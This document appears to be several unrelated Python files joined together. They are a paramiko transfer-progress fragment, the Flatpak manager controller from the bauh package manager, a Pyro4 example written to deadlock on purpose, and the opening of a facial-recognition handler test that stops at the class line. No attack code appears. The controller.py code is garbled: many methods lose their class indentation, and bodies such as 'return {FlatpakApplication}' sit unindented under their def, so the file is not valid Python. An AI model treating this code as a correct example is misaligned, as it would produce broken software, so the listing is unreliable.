        pc = format((self.transferred / self.to_transfer) * 100, '.2f')
        self.logger.debug(msg.format(pc, self.transferred, self.to_transfer))
        return progressed

    @contextmanager
    def manage(self, sources, dest, direction, transferer):
        # Extends the base manage() with the paramiko client and converts the
        # socket error caused by a monitor-initiated cancel into TimeoutError.
        with super().manage(sources, dest, direction):
            try:
                self.progressed = False
                self.transferer = transferer  # SFTPClient or SCPClient
                yield self
            except socket.error as e:
                if self.transfer_aborted.is_set():
                    self.transfer_aborted.clear()
                    method = 'SCP' if self.conn.use_scp else 'SFTP'
                    raise TimeoutError('{} {}: {} -> {}'.format(method, self.direction, sources, self.dest))
                else:
                    raise e

    def progress_cb(self, *args):
        # Invoked by paramiko/scp with differing signatures; record progress
        # only once the transfer has officially started.
        if self.transfer_started.is_set():
            self.progressed = True
            if len(args) == 3:  # For SCPClient callbacks
                self.transferred = args[2]
                self.to_transfer = args[1]
            elif len(args) == 2:  # For SFTPClient callbacks
                self.transferred = args[0]
                self.to_transfer = args[1]
|
controller.py | import os
import re
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Optional
from packaging.version import Version
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
UpgradeRequirement, TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageHistory, PackageUpdate, SoftwarePackage, PackageSuggestion, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, FormComponent, SingleSelectComponent, InputOption, SelectViewType, \
ViewComponent, PanelComponent
from bauh.commons import user
from bauh.commons.boot import CreateConfigFile
from bauh.commons.html import strip_html, bold
from bauh.commons.system import ProcessHandler
from bauh.gems.flatpak import flatpak, SUGGESTIONS_FILE, CONFIG_FILE, UPDATES_IGNORED_FILE, CONFIG_DIR, EXPORTS_PATH, \
get_icon_path, VERSION_1_5, VERSION_1_4
from bauh.gems.flatpak.config import FlatpakConfigManager
from bauh.gems.flatpak.constants import FLATHUB_API_URL
from bauh.gems.flatpak.model import FlatpakApplication
from bauh.gems.flatpak.worker import FlatpakAsyncDataLoader, FlatpakUpdateLoader
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.000Z'
RE_INSTALL_REFS = re.compile(r'\d+\)\s+(.+)')
class FlatpakManager(SoftwareManager):
    def __init__(self, context: ApplicationContext):
        """Set up caches, i18n and configuration for the Flatpak gem.

        :param context: shared application context supplied by bauh's core.
        """
        super(FlatpakManager, self).__init__(context=context)
        self.i18n = context.i18n
        # Cache for application data fetched asynchronously from the Flathub API.
        self.api_cache = context.cache_factory.new(None)
        self.category_cache = context.cache_factory.new(None)
        context.disk_loader_factory.map(FlatpakApplication, self.api_cache)
        self.enabled = True
        self.http_client = context.http_client
        self.suggestions_cache = context.cache_factory.new(None)
        self.logger = context.logger
        self.configman = FlatpakConfigManager()
def get_managed_types(self) -> Set["type"]:
return {FlatpakApplication}
    def _map_to_model(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> FlatpakApplication:
        """Convert a raw flatpak JSON dict into a FlatpakApplication model.

        Valid cached API data is applied synchronously; otherwise (for
        non-runtime apps, with internet available) an async loader is started
        to (re)fetch the data in the background.
        """
        app = FlatpakApplication(**app_json, i18n=self.i18n)
        app.installed = installed
        api_data = self.api_cache.get(app_json['id'])
        # cached data is stale once its 'expires_at' timestamp has passed
        expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
        if not api_data or expired_data:
            if not app.runtime:
                if disk_loader:
                    disk_loader.fill(app)  # preloading cached disk data
                if internet:
                    FlatpakAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self,
                                           context=self.context, category_cache=self.category_cache).start()
        else:
            app.fill_cached_data(api_data)
            app.status = PackageStatus.READY
        return app
    def _get_search_remote(self) -> str:
        """Return the installation level ('system' or 'user') used for remote
        searches, preferring system-wide remotes.

        When no remote is configured at either level, defaults to 'user' and
        asks flatpak to register the default remotes for that level.
        """
        remotes = flatpak.list_remotes()
        if remotes['system']:
            remote_level = 'system'
        elif remotes['user']:
            remote_level = 'user'
        else:
            # no remotes configured at all: fall back to the user level and
            # set up the default remotes (e.g. Flathub) for it
            remote_level = 'user'
            ProcessHandler().handle_simple(flatpak.set_default_remotes(remote_level))
        return remote_level
    def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
        """Search Flatpak remotes for applications matching *words*.

        :param words: query string forwarded to 'flatpak search'.
        :param disk_loader: loader used to fill cached data of installed apps.
        :param limit: unused here (kept for the SoftwareManager interface).
        :param is_url: URL-based queries are not supported -> empty result.
        """
        if is_url:
            return SearchResult([], [], 0)
        remote_level = self._get_search_remote()
        res = SearchResult([], [], 0)
        apps_found = flatpak.search(flatpak.get_version(), words, remote_level)
        if apps_found:
            already_read = set()
            installed_apps = self.read_installed(disk_loader=disk_loader, internet_available=True).installed
            if installed_apps:
                # match search hits against already installed applications
                for app_found in apps_found:
                    for installed_app in installed_apps:
                        if app_found['id'] == installed_app.id:
                            res.installed.append(installed_app)
                            already_read.add(app_found['id'])
            if len(apps_found) > len(already_read):
                # remaining hits are not installed: map them to new models
                for app_found in apps_found:
                    if app_found['id'] not in already_read:
                        res.new.append(self._map_to_model(app_found, False, disk_loader))
        res.total = len(res.installed) + len(res.new)
        return res
    def _add_updates(self, version: Version, output: list):
        """Thread target: fetch the available updates and append them to *output*."""
        output.append(flatpak.list_updates_as_str(version))
    def read_installed(self, disk_loader: Optional[DiskCacheLoader], limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
        """Return all installed Flatpak applications/runtimes.

        When online, the list of available updates is fetched concurrently
        and merged into the models; partial (component) updates on
        Flatpak >= 1.4 are attached as extra partial models.
        """
        version = flatpak.get_version()
        updates = []
        if internet_available:
            # fetch the update list in parallel with 'flatpak list'
            thread_updates = Thread(target=self._add_updates, args=(version, updates))
            thread_updates.start()
        else:
            thread_updates = None
        installed = flatpak.list_installed(version)
        models = []
        if installed:
            update_map = None
            if thread_updates:
                thread_updates.join()
                update_map = updates[0]
            for app_json in installed:
                model = self._map_to_model(app_json=app_json, installed=True,
                                           disk_loader=disk_loader, internet=internet_available)
                model.update = None
                models.append(model)
                if update_map and (update_map['full'] or update_map['partial']):
                    if version >= VERSION_1_4:
                        # Flatpak >= 1.4 identifies updates by id/branch/installation
                        update_id = '{}/{}/{}'.format(app_json['id'], app_json['branch'], app_json['installation'])
                        if update_map['full'] and update_id in update_map['full']:
                            model.update = True
                        if update_map['partial']:
                            for partial in update_map['partial']:
                                partial_data = partial.split('/')
                                if app_json['id'] in partial_data[0] and\
                                        app_json['branch'] == partial_data[1] and\
                                        app_json['installation'] == partial_data[2]:
                                    # component update: exposed as its own model
                                    partial_model = model.gen_partial(partial.split('/')[0])
                                    partial_model.update = True
                                    models.append(partial_model)
                    else:
                        # older flatpak identifies updates by installation/ref
                        model.update = '{}/{}'.format(app_json['installation'], app_json['ref']) in update_map['full']
        if models:
            # flag models whose updates the user chose to ignore
            ignored = self._read_ignored_updates()
            if ignored:
                for model in models:
                    if model.get_update_ignore_key() in ignored:
                        model.updates_ignored = True
        return SearchResult(models, None, len(models))
    def downgrade(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher) -> bool:
        """Downgrade *pkg* to the commit preceding its current one.

        :return: True when the downgrade command succeeded.
        """
        if not self._make_exports_dir(watcher):
            return False
        watcher.change_progress(10)
        watcher.change_substatus(self.i18n['flatpak.downgrade.commits'])
        history = self.get_history(pkg, full_commit_str=True)
        # downgrade is not possible if the app current commit in the first one:
        if history.pkg_status_idx == len(history.history) - 1:
            watcher.show_message(self.i18n['flatpak.downgrade.impossible.title'],
                                 self.i18n['flatpak.downgrade.impossible.body'].format(bold(pkg.name)),
                                 MessageType.ERROR)
            return False
        # the next history entry holds the previous (older) commit
        commit = history.history[history.pkg_status_idx + 1]['commit']
        watcher.change_substatus(self.i18n['flatpak.downgrade.reverting'])
        watcher.change_progress(50)
        success, _ = ProcessHandler(watcher).handle_simple(flatpak.downgrade(pkg.ref,
                                                                             commit,
                                                                             pkg.installation,
                                                                             root_password))
        watcher.change_progress(100)
        return success
def clean_cache_for(self, pkg: FlatpakApplication):
super(FlatpakManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
    def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
        """Upgrade every package listed in *requirements.to_upgrade*.

        :return: True when all packages upgraded; aborts on the first failure.
        """
        flatpak_version = flatpak.get_version()
        if not self._make_exports_dir(watcher):
            return False
        for req in requirements.to_upgrade:
            watcher.change_status("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], req.pkg.name, req.pkg.version))
            related, deps = False, False
            ref = req.pkg.ref
            # partial components cannot be updated on their own before 1.5:
            # update the base ref together with related refs and dependencies
            if req.pkg.partial and flatpak_version < VERSION_1_5:
                related, deps = True, True
                ref = req.pkg.base_ref
            try:
                res, _ = ProcessHandler(watcher).handle_simple(flatpak.update(app_ref=ref,
                                                                              installation=req.pkg.installation,
                                                                              related=related,
                                                                              deps=deps))
                watcher.change_substatus('')
                if not res:
                    self.logger.warning("Could not upgrade '{}'".format(req.pkg.id))
                    return False
            except:
                watcher.change_substatus('')
                self.logger.error("An error occurred while upgrading '{}'".format(req.pkg.id))
                traceback.print_exc()
                return False
        watcher.change_substatus('')
        return True
    def uninstall(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
        """Uninstall *pkg*; on success, drop its suggestion-cache entry and
        any 'ignore updates' marker."""
        if not self._make_exports_dir(watcher):
            return TransactionResult.fail()
        uninstalled, _ = ProcessHandler(watcher).handle_simple(flatpak.uninstall(pkg.ref, pkg.installation))
        if uninstalled:
            if self.suggestions_cache:
                self.suggestions_cache.delete(pkg.id)
            self.revert_ignored_update(pkg)
            return TransactionResult(success=True, installed=None, removed=[pkg])
        return TransactionResult.fail()
def get_info(self, app: FlatpakApplication) -> dict:
    """Return the detail fields displayed for *app*.

    Installed apps are inspected through the flatpak CLI; otherwise the
    Flathub web API is queried. Returns an empty dict when nothing is found.
    """
    if app.installed:
        version = flatpak.get_version()

        # partial refs cannot be inspected directly on flatpak < 1.5
        id_ = app.base_id if app.partial and version < VERSION_1_5 else app.id
        app_info = flatpak.get_app_info_fields(id_, app.branch, app.installation)

        if app.partial and version < VERSION_1_5:
            app_info['id'] = app.id
            app_info['ref'] = app.ref

        app_info['name'] = app.name
        app_info['type'] = 'runtime' if app.runtime else 'app'
        app_info['description'] = strip_html(app.description) if app.description else ''

        if app.installation:
            app_info['installation'] = app.installation

        if app_info.get('installed'):
            app_info['installed'] = app_info['installed'].replace('?', ' ')

        return app_info
    else:
        res = self.http_client.get_json('{}/apps/{}'.format(FLATHUB_API_URL, app.id))

        if res:
            if res.get('categories'):
                res['categories'] = [c.get('name') for c in res['categories']]

            for to_del in ('screenshots', 'iconMobileUrl', 'iconDesktopUrl'):
                if res.get(to_del):
                    del res[to_del]

            for to_strip in ('description', 'currentReleaseDescription'):
                if res.get(to_strip):
                    res[to_strip] = strip_html(res[to_strip])

            for to_date in ('currentReleaseDate', 'inStoreSinceDate'):
                if res.get(to_date):
                    try:
                        res[to_date] = datetime.strptime(res[to_date], DATE_FORMAT)
                    except (ValueError, TypeError):  # was a bare 'except:' followed by a dead 'pass'
                        self.context.logger.error('Could not convert date string {} as {}'.format(res[to_date], DATE_FORMAT))

            return res
        else:
            return {}
def get_history(self, pkg: FlatpakApplication, full_commit_str: bool = False) -> PackageHistory:
    """Return the commit history of *pkg* and the index of its current commit.

    full_commit_str: when False the package's commit hash is shortened to 8
    characters so it can be compared against the short hashes returned by
    'flatpak.get_app_commits_data'.
    """
    pkg.commit = flatpak.get_commit(pkg.id, pkg.branch, pkg.installation)
    pkg_commit = pkg.commit if pkg.commit else None

    if pkg_commit and not full_commit_str:
        pkg_commit = pkg_commit[0:8]

    commits = flatpak.get_app_commits_data(pkg.ref, pkg.origin, pkg.installation, full_str=full_commit_str)

    status_idx = 0
    commit_found = False

    # current commit unknown and the newest entry is '(null)': drop that entry
    # and treat the (new) first one as current
    if pkg_commit is None and len(commits) > 1 and commits[0]['commit'] == '(null)':
        del commits[0]
        # NOTE(review): this assigns the whole commit dict, not its 'commit'
        # string — presumably commits[0]['commit'] was intended. Harmless as
        # written because pkg_commit is not compared again once commit_found
        # is True, but confirm before relying on pkg_commit's type here.
        pkg_commit = commits[0]
        commit_found = True

    if not commit_found:
        for idx, data in enumerate(commits):
            if data['commit'] == pkg_commit:
                status_idx = idx
                commit_found = True
                break

    # installed commit not listed yet (local '(null)' head): expose it as the
    # newest entry so the UI can show it
    if not commit_found and pkg_commit and commits[0]['commit'] == '(null)':
        commits[0]['commit'] = pkg_commit

    return PackageHistory(pkg=pkg, history=commits, pkg_status_idx=status_idx)
def _make_exports_dir(self, watcher: ProcessWatcher) -> bool:
    """Ensure the Flatpak exports directory exists.

    Returns False only when the directory is missing and cannot be created.
    """
    if os.path.exists(EXPORTS_PATH):
        return True

    self.logger.info("Creating dir '{}'".format(EXPORTS_PATH))
    watcher.print('Creating dir {}'.format(EXPORTS_PATH))

    try:
        Path(EXPORTS_PATH).mkdir(parents=True, exist_ok=True)
        return True
    except:
        watcher.print('Error while creating the directory {}'.format(EXPORTS_PATH))
        return False
def install(self, pkg: FlatpakApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
    """Install *pkg* and report everything that ended up installed.

    Steps: resolve the installation level (config value or user prompt),
    ensure a default remote exists for that level, run 'flatpak install'
    (asking the user to disambiguate when several refs match), then diff the
    installed list to also report runtimes pulled in by the installation.
    """
    flatpak_config = self.configman.get_config()

    install_level = flatpak_config['installation_level']

    if install_level is not None:
        # note: 'Flaptak' typo below is in the original log string
        self.logger.info("Default Flaptak installation level defined: {}".format(install_level))

        # reject anything other than the two supported levels
        if install_level not in ('user', 'system'):
            watcher.show_message(title=self.i18n['error'].capitalize(),
                                 body=self.i18n['flatpak.install.bad_install_level.body'].format(field=bold('installation_level'),
                                                                                                 file=bold(CONFIG_FILE)),
                                 type_=MessageType.ERROR)
            return TransactionResult(success=False, installed=[], removed=[])

        pkg.installation = install_level
    else:
        # no configured level: ask the user.
        # NOTE(review): confirmation label is 'no' and deny label is 'yes' —
        # confirming apparently answers "no, not system-wide" (user level);
        # verify against the i18n prompt text.
        user_level = watcher.request_confirmation(title=self.i18n['flatpak.install.install_level.title'],
                                                  body=self.i18n['flatpak.install.install_level.body'].format(bold(pkg.name)),
                                                  confirmation_label=self.i18n['no'].capitalize(),
                                                  deny_label=self.i18n['yes'].capitalize())
        pkg.installation = 'user' if user_level else 'system'

    remotes = flatpak.list_remotes()

    handler = ProcessHandler(watcher)

    # make sure a default remote exists for the chosen level; system-level
    # setup needs root credentials when we are not already root
    if pkg.installation == 'user' and not remotes['user']:
        handler.handle_simple(flatpak.set_default_remotes('user'))
    elif pkg.installation == 'system' and not remotes['system']:
        if user.is_root():
            handler.handle_simple(flatpak.set_default_remotes('system'))
        else:
            valid, user_password = watcher.request_root_password()

            if not valid:
                watcher.print('Operation aborted')
                return TransactionResult(success=False, installed=[], removed=[])
            else:
                if not handler.handle_simple(flatpak.set_default_remotes('system', user_password))[0]:
                    watcher.show_message(title=self.i18n['error'].capitalize(),
                                         body=self.i18n['flatpak.remotes.system_flathub.error'],
                                         type_=MessageType.ERROR)
                    watcher.print("Operation cancelled")
                    return TransactionResult(success=False, installed=[], removed=[])

    # retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
    flatpak_version = flatpak.get_version()
    installed = flatpak.list_installed(flatpak_version)
    installed_by_level = {'{}:{}:{}'.format(p['id'], p['name'], p['branch']) for p in installed if p['installation'] == pkg.installation} if installed else None

    if not self._make_exports_dir(handler.watcher):
        return TransactionResult(success=False, installed=[], removed=[])

    installed, output = handler.handle_simple(flatpak.install(str(pkg.id), pkg.origin, pkg.installation))

    # the id alone may match several refs: let the user pick one and retry
    if not installed and 'error: No ref chosen to resolve matches' in output:
        ref_opts = RE_INSTALL_REFS.findall(output)

        if ref_opts and len(ref_opts) > 1:
            view_opts = [InputOption(label=o, value=o.strip()) for o in ref_opts if o]
            ref_select = SingleSelectComponent(type_=SelectViewType.RADIO, options=view_opts, default_option=view_opts[0], label='')

            if watcher.request_confirmation(title=self.i18n['flatpak.install.ref_choose.title'],
                                            body=self.i18n['flatpak.install.ref_choose.body'].format(bold(pkg.name)),
                                            components=[ref_select],
                                            confirmation_label=self.i18n['proceed'].capitalize(),
                                            deny_label=self.i18n['cancel'].capitalize()):
                ref = ref_select.get_selected()
                installed, output = handler.handle_simple(flatpak.install(ref, pkg.origin, pkg.installation))
                pkg.ref = ref
                pkg.runtime = 'runtime' in ref
            else:
                watcher.print('Aborted by the user')
                return TransactionResult.fail()
        else:
            return TransactionResult.fail()

    if installed:
        # refresh ref/branch from the actual installation (best effort)
        try:
            fields = flatpak.get_fields(str(pkg.id), pkg.branch, ['Ref', 'Branch'])

            if fields:
                pkg.ref = fields[0]
                pkg.branch = fields[1]
        except:
            traceback.print_exc()

    if installed:
        new_installed = [pkg]

        # diff against the pre-install snapshot to find runtimes that were
        # installed alongside the requested application
        current_installed = flatpak.list_installed(flatpak_version)
        current_installed_by_level = [p for p in current_installed if p['installation'] == pkg.installation] if current_installed else None

        if current_installed_by_level and (not installed_by_level or len(current_installed_by_level) > len(installed_by_level) + 1):
            pkg_key = '{}:{}:{}'.format(pkg.id, pkg.name, pkg.branch)
            net_available = self.context.is_internet_available()

            for p in current_installed_by_level:
                current_key = '{}:{}:{}'.format(p['id'], p['name'], p['branch'])

                if current_key != pkg_key and (not installed_by_level or current_key not in installed_by_level):
                    new_installed.append(self._map_to_model(app_json=p, installed=True,
                                                            disk_loader=disk_loader, internet=net_available))

        return TransactionResult(success=installed, installed=new_installed, removed=[])
    else:
        return TransactionResult.fail()
def is_enabled(self):
    """Tell whether this software manager is currently enabled."""
    return self.enabled
def set_enabled(self, enabled: bool):
    """Enable or disable this software manager."""
    self.enabled = enabled
def can_work(self) -> bool:
    """The manager can only operate when the flatpak CLI is available."""
    return flatpak.is_installed()
def requires_root(self, action: SoftwareAction, pkg: FlatpakApplication) -> bool:
    """Root is only required when downgrading a system-level installation."""
    return action == SoftwareAction.DOWNGRADE and pkg.installation == 'system'
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
    """Kick off the background task that ensures the Flatpak config file exists."""
    CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
                     task_icon_path=get_icon_path(), logger=self.logger).start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
    """List the available, non-ignored updates for the installed packages."""
    installed = self.read_installed(None, internet_available=internet_available).installed
    pending = [app for app in installed if app.update and not app.is_update_ignored()]

    if not pending:
        return []

    # fetch the latest version of each application concurrently
    loaders = [FlatpakUpdateLoader(app=app, http_client=self.context.http_client)
               for app in pending if app.is_application()]

    for loader in loaders:
        loader.start()

    for loader in loaders:
        loader.join()

    return [PackageUpdate(pkg_id='{}:{}:{}'.format(app.id, app.branch, app.installation),
                          pkg_type='Flatpak',
                          name=app.name,
                          version=app.version)
            for app in pending]
def list_warnings(self, internet_available: bool) -> List[str]:
    """The Flatpak manager never emits startup warnings."""
    return []
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
    """Download the curated suggestions file and map up to *limit* entries.

    Each line of the file has the form '<priority>=<app id>'. Installed apps
    are skipped when *filter_installed* is True, and already-mapped
    suggestions are served from 'suggestions_cache'. Results are sorted by
    descending priority. A non-positive *limit* means "no limit".
    """
    cli_version = flatpak.get_version()
    res = []

    self.logger.info("Downloading the suggestions file {}".format(SUGGESTIONS_FILE))
    file = self.http_client.get(SUGGESTIONS_FILE)

    if not file or not file.text:
        self.logger.warning("No suggestion found in {}".format(SUGGESTIONS_FILE))
        return res
    else:
        self.logger.info("Mapping suggestions")
        remote_level = self._get_search_remote()
        installed = {i.id for i in self.read_installed(disk_loader=None).installed} if filter_installed else None

        for line in file.text.split('\n'):
            if line:
                if limit <= 0 or len(res) < limit:
                    # line format: '<priority>=<app id>'
                    sug = line.split('=')
                    appid = sug[1].strip()

                    if installed and appid in installed:
                        continue

                    priority = SuggestionPriority(int(sug[0]))
                    cached_sug = self.suggestions_cache.get(appid)

                    if cached_sug:
                        res.append(cached_sug)
                    else:
                        # resolve the id through 'flatpak search' and cache the mapping
                        app_json = flatpak.search(cli_version, appid, remote_level, app_id=True)

                        if app_json:
                            model = PackageSuggestion(self._map_to_model(app_json[0], False, None), priority)
                            self.suggestions_cache.add(appid, model)
                            res.append(model)
                else:
                    break

        res.sort(key=lambda s: s.priority.value, reverse=True)
        return res
def is_default_enabled(self) -> bool:
    """Flatpak support is enabled by default."""
    return True
def launch(self, pkg: FlatpakApplication):
    """Run the installed application associated with *pkg*."""
    flatpak.run(str(pkg.id))
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
    """Return the desktop screenshot URLs that Flathub publishes for *pkg*."""
    screenshots_url = '{}/apps/{}'.format(FLATHUB_API_URL, pkg.id)
    urls = []

    try:
        data = self.http_client.get_json(screenshots_url)
        screenshots = data.get('screenshots') if data else None

        if screenshots:
            urls.extend(shot['imgDesktopUrl'] for shot in screenshots if shot.get('imgDesktopUrl'))
    except Exception as e:
        # a body that isn't valid JSON is an expected failure mode; anything
        # else is unexpected and gets a full traceback
        if e.__class__.__name__ == 'JSONDecodeError':
            self.context.logger.error("Could not decode json from '{}'".format(screenshots_url))
        else:
            traceback.print_exc()

    return urls
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
    """Build the settings panel: a radio selector for the default install level.

    The pre-selected option mirrors the current 'installation_level' config
    value (None means "ask on every install"). screen_height is unused.
    """
    fields = []

    flatpak_config = self.configman.get_config()

    install_opts = [InputOption(label=self.i18n['flatpak.config.install_level.system'].capitalize(),
                                value='system',
                                tooltip=self.i18n['flatpak.config.install_level.system.tip']),
                    InputOption(label=self.i18n['flatpak.config.install_level.user'].capitalize(),
                                value='user',
                                tooltip=self.i18n['flatpak.config.install_level.user.tip']),
                    InputOption(label=self.i18n['ask'].capitalize(),
                                value=None,
                                tooltip=self.i18n['flatpak.config.install_level.ask.tip'].format(app=self.context.app_name))]

    fields.append(SingleSelectComponent(label=self.i18n['flatpak.config.install_level'],
                                        options=install_opts,
                                        default_option=[o for o in install_opts if o.value == flatpak_config['installation_level']][0],
                                        max_per_line=len(install_opts),
                                        max_width=floor(screen_width * 0.22),
                                        type_=SelectViewType.RADIO))

    return PanelComponent([FormComponent(fields, self.i18n['installation'].capitalize())])
def save_settings(self, component: PanelComponent) -> Tuple[bool, Optional[List[str]]]:
    """Persist the installation level chosen on the settings panel.

    Returns (True, None) on success or (False, [traceback]) on failure.
    """
    flatpak_config = self.configman.get_config()
    flatpak_config['installation_level'] = component.components[0].components[0].get_selected()

    try:
        self.configman.save_config(flatpak_config)
    except:
        return False, [traceback.format_exc()]

    return True, None
def get_upgrade_requirements(self, pkgs: List[FlatpakApplication], root_password: str, watcher: ProcessWatcher) -> UpgradeRequirements:
    """Attach download sizes to *pkgs* and return them in proper update order."""
    flatpak_version = flatpak.get_version()

    # split the packages per installation level (dict preserves user-first order)
    by_level = {'user': [], 'system': []}
    for pkg in pkgs:
        by_level['user' if pkg.installation == 'user' else 'system'].append(pkg)

    for level, level_pkgs in by_level.items():
        if level_pkgs:
            sizes = flatpak.map_update_download_size([str(p.id) for p in level_pkgs], level, flatpak_version)

            if sizes:
                for p in level_pkgs:
                    p.size = sizes.get(str(p.id))

    to_update = [UpgradeRequirement(pkg=p, extra_size=p.size, required_size=p.size)
                 for p in self.sort_update_order(pkgs)]
    return UpgradeRequirements(None, None, to_update, [])
def sort_update_order(self, pkgs: List[FlatpakApplication]) -> List[FlatpakApplication]:
    """Order *pkgs* so runtimes (each preceded by its partial, if any) come
    before applications."""
    partials, runtimes, apps = [], [], []

    for pkg in pkgs:
        if not pkg.runtime:
            apps.append(pkg)
        elif pkg.partial:
            partials.append(pkg)
        else:
            runtimes.append(pkg)

    if not runtimes:
        return [*partials, *apps]

    if not partials:
        return [*runtimes, *apps]

    # place each partial right before its base runtime (same installation level)
    ordered_runtimes = []
    for runtime in runtimes:
        matching = next((p for p in partials
                         if p.installation == runtime.installation and p.base_id == runtime.id), None)
        if matching is not None:
            ordered_runtimes.append(matching)
        ordered_runtimes.append(runtime)

    return [*ordered_runtimes, *apps]
def _read_ignored_updates(self) -> Set[str]:
    """Read the persisted set of ignored-update keys (one per line)."""
    ignored = set()

    if os.path.exists(UPDATES_IGNORED_FILE):
        with open(UPDATES_IGNORED_FILE) as f:
            for raw_line in f.read().split('\n'):
                key = raw_line.strip()
                if key:
                    ignored.add(key)

    return ignored
def _write_ignored_updates(self, keys: Set[str]):
    """Persist *keys* (sorted, one per line) to the ignored-updates file."""
    Path(CONFIG_DIR).mkdir(parents=True, exist_ok=True)

    with open(UPDATES_IGNORED_FILE, 'w+') as f:
        f.write(''.join('{}\n'.format(key) for key in sorted(keys)))
def ignore_update(self, pkg: FlatpakApplication):
    """Add *pkg* to the persisted ignored-updates set and flag the instance."""
    ignored_keys = self._read_ignored_updates()
    pkg_key = pkg.get_update_ignore_key()

    if pkg_key not in ignored_keys:
        ignored_keys.add(pkg_key)
        self._write_ignored_updates(ignored_keys)

    pkg.updates_ignored = True
def revert_ignored_update(self, pkg: FlatpakApplication):
    """Remove *pkg* from the persisted ignored-updates set, if present."""
    ignored_keys = self._read_ignored_updates()

    if ignored_keys:
        pkg_key = pkg.get_update_ignore_key()

        if pkg_key in ignored_keys:
            ignored_keys.discard(pkg_key)
            self._write_ignored_updates(ignored_keys)

    pkg.updates_ignored = False
|
client.py | from __future__ import print_function
import threading
import Pyro4
import bouncer
abort = False
def PyroLoop(daemon):
    """Thread target: serve incoming requests on *daemon* until it is shut down."""
    daemon.requestLoop()
def main():
    """Demonstrate a Pyro4 callback deadlock (intentional).

    Client and server each hold a proxy to the other; 'server.process'
    triggers a callback that tries to re-use the client's already-engaged
    proxy, so the final call never returns.
    """
    global abort  # NOTE(review): 'abort' is never used in this function
    daemon = Pyro4.Daemon()
    server = Pyro4.Proxy("PYRONAME:example.deadlock")
    bounceObj = bouncer.Bouncer("Client")
    daemon.register(bounceObj) # callback object

    # register callback on the server
    server.register(bounceObj)

    # Now register server as 'callback' on the bounce object in this client
    # note: we're using the same proxy here as the main program!
    # This is the main cause of the deadlock, because this proxy will already
    # be engaged in a call when the callback object here wants to use it as well.
    # One solution could be to use a new proxy from inside the callback object, like this:
    #   server2 = server.__copy__()
    #   bounceObj.register(server2)
    bounceObj.register(server)

    # create a daemon thread that handles incoming callback requests
    thread = threading.Thread(target=PyroLoop, args=(daemon,))
    thread.setDaemon(True)
    thread.start()

    print("This bounce example will deadlock!")
    print("Read the source or Readme.txt for more info why this is the case!")
    print("Calling server...")
    result = server.process(["hello"])
    print("Result=", result) # <--- you will never see this, it will deadlock in the previous call


if __name__ == '__main__':
    main()
|
test_facial_recognition_handler.py | """utest channel handler module"""
# -*- coding: UTF-8 -*-
#
# =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
import os
import sys
import time
import threading
import unittest
from unittest.mock import patch
# Locate the presenter server package relative to this test file and make it
# importable: <workspace>/ascenddk/common/presenter/server/
path = os.path.dirname(__file__)
index = path.rfind("ascenddk")
workspace = path[0: index]
path = os.path.join(workspace, "ascenddk/common/presenter/server/")
sys.path.append(path)
from common.channel_manager import ChannelManager
import facial_recognition.src.facial_recognition_handler as facial_recognition_handler
from facial_recognition.src.facial_recognition_handler import FacialRecognitionHandler
import common.channel_handler as channel_handler
def mock_wait(a):
    """Stand-in for Event.wait: simulate a short wait, then report success."""
    time.sleep(0.1)
    return True
class TestFacialRecognitionHandler(unittest.TestCase):
